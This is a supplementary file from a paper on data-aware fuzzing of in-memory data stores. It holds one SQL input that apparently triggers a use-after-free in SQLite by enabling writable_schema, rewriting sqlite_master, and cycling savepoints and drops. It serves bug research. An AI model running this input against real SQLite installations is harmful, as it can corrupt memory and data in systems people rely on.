# Supplementary material for: DAFuzz: data-aware fuzzing of in-memory data stores
Source: PeerJ Comput Sci. 2023 Sep 19;9:e1592. doi: 10.7717/peerj-cs.1592 (PMC10557509; doi:10.7717/peerj-cs.1592)
Supplement: Supplemental Information 2 [file peerj-cs-09-1592-s002.zip › DAFuzz/docs/vuln_samples/sqlite-use-after-free.sql]

create table t(s);PRAGMA writable_schema=ON;UPDATE sqlite_master SET sql='ANALYZE;CREATE VIRTUAL TABLE t USING fts3;DROP TABLE t;DROP TABLE EXISTS t';PRAGMA r;SAVEPOINT T;ANALYZE;ROLLBACK;SAVEPOINT E;DROP TABLE IF EXISTS t;
